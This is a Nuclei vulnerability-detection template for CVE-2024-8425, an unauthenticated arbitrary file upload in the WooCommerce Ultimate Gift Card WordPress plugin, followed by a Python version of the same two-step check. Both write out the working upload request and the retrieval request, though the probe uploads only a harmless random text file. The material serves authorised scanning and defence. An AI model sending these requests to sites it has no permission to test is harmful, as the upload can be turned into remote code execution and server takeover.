id: CVE-2024-8425

info:
  name: WooCommerce Ultimate Gift Card ≤ 2.6.0 - Arbitrary File Upload
  author: jsnv-dev
  severity: critical
  description: |
    The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file upload due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files to the affected site's server, which may lead to remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary files, including PHP scripts, to the server because the file type is not validated, enabling remote code execution and complete server compromise.
  remediation: |
    Update the WooCommerce Ultimate Gift Card plugin to a version later than 2.6.0 that addresses the arbitrary file upload vulnerability in the mwb_wgm_preview_mail and mwb_wgm_woocommerce_add_cart_item_data functions.
  reference:
    - https://github.com/KTN1990/CVE-2024-8425
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card-260-unauthenticated-arbitrary-file-upload
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8425
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8425
    epss-score: 0.41027
    epss-percentile: 0.9746
    cwe-id: CWE-434
    cpe: cpe:2.3:a:wpswings:woocommerce_ultimate_gift_card:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpswings
    product: woocommerce_ultimate_gift_card
    fofa-query: body="/wp-content/plugins/woocommerce-ultimate-gift-card"
  tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev,vuln

variables:
  filename: "{{rand_base(7)}}.txt"
  file_content: "{{randstr}}"
  file_message: "{{randstr}}"
  boundary_id: "{{rand_int(100000,999999)}}"

flow: http(1) && http(2)

http:
  # Step 1: unauthenticated multipart POST to the preview-mail AJAX action.
  # The "file" part is declared as image/jpeg but carries a .txt name and
  # arbitrary text; a vulnerable version stores it unchanged and echoes
  # "<message>&name=<filename>" in the response.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}

        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="mwb_wgm_preview_email"

        test
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="tempId"

        1
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="message"

        {{file_message}}
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: image/jpeg

        {{file_content}}
        ------WebKitFormBoundary{{boundary_id}}--

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{file_message}}&name={{filename}}")'
        condition: and
        internal: true

  # Step 2: confirm the upload is web-accessible by fetching it back from the
  # plugin's upload directory and checking for the random content sent above.
  - raw:
      - |
        GET /wp-content/uploads/mwb_browse/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{file_content}}"

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - file_content
# digest: 490a00463044022004c5ee13badb3c43aa9cd59e9fccfd950d193fe6b8079e4e12956bb743b0400a0220531147b2bfd0943526b34a51ccf8e93f9881b4f5d5b5b95aba293051630c0fb5:922c64590222798bb761d5b6d8e72950
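The two-step check above, rewritten as an added Python example so the multipart request and both matchers can be inspected and unit-tested without running nuclei. This is my code, not part of the template or of the plugin; it assumes only a base URL for a WordPress site you are authorised to test, mirrors the template's harmless random `.txt` probe, and uses the endpoint and upload path the template gives. The assumed helper names (`build_multipart`, `accepted_upload`, `confirms_retrieval`, `probe`) are mine.

```python
"""Added example for CVE-2024-8425 (not the template's or the plugin's code).

Reproduces the Nuclei template's two-step check in plain Python:
  1. POST a multipart form to admin-ajax.php?action=mwb_wgm_preview_mail with a
     "file" part declared as image/jpeg but named *.txt (the template's probe);
     a vulnerable version answers 200 and echoes "<message>&name=<filename>".
  2. GET /wp-content/uploads/mwb_browse/<filename> and check the random content
     is served back, proving the upload is web-accessible.
Assumption: the target base URL is supplied by the caller; only a random .txt
file is ever uploaded (no PHP), matching the template's benign probe.
"""
import secrets
import string
import urllib.error
import urllib.request

AJAX_PATH = "/wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail"  # from the template
UPLOAD_DIR = "/wp-content/uploads/mwb_browse/"                       # from the template


def random_token(n: int = 12) -> str:
    """Random alphanumeric token, the stand-in for nuclei's {{randstr}} / {{rand_base}}."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def build_multipart(message: str, filename: str, file_content: str,
                    boundary_id: str) -> tuple[str, bytes]:
    """Return (Content-Type header value, body bytes) laid out exactly like the
    template's raw request: three text fields, then one 'file' part whose
    declared type (image/jpeg) deliberately disagrees with its .txt name."""
    boundary = "----WebKitFormBoundary" + boundary_id
    fields = [("mwb_wgm_preview_email", "test"), ("tempId", "1"), ("message", message)]
    parts = []
    for name, value in fields:
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        f"Content-Type: image/jpeg\r\n\r\n{file_content}\r\n"
    )
    parts.append(f"--{boundary}--\r\n")
    return f"multipart/form-data; boundary={boundary}", "".join(parts).encode()


def accepted_upload(status: int, body: str, message: str, filename: str) -> bool:
    """Step-1 matcher: HTTP 200 and the body echoes '<message>&name=<filename>'."""
    return status == 200 and f"{message}&name={filename}" in body


def confirms_retrieval(status: int, body: str, file_content: str) -> bool:
    """Step-2 matcher: the stored file is served back verbatim from mwb_browse/."""
    return status == 200 and file_content in body


def _send(req: urllib.request.Request, timeout: float) -> tuple[int, str]:
    """Send a request and return (status, decoded body), treating 4xx/5xx as data."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """Run both steps against a live host you are authorised to test and return
    the intermediate verdicts so a reviewer can see which matcher fired."""
    base = base_url.rstrip("/")
    message, content = random_token(), random_token()
    filename = random_token(7) + ".txt"                       # {{rand_base(7)}}.txt
    boundary_id = str(secrets.randbelow(900000) + 100000)     # {{rand_int(100000,999999)}}
    ctype, body = build_multipart(message, filename, content, boundary_id)
    status, text = _send(urllib.request.Request(base + AJAX_PATH, data=body,
                                                headers={"Content-Type": ctype},
                                                method="POST"), timeout)
    result = {"filename": filename,
              "upload_accepted": accepted_upload(status, text, message, filename),
              "file_served": False}
    if result["upload_accepted"]:
        status, text = _send(urllib.request.Request(base + UPLOAD_DIR + filename), timeout)
        result["file_served"] = confirms_retrieval(status, text, content)
    return result


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Note that, as with the template, a positive result leaves the probe file in `wp-content/uploads/mwb_browse/`; the plugin offers no unauthenticated way to delete it, so record the filename from the result and remove it from the host during clean-up.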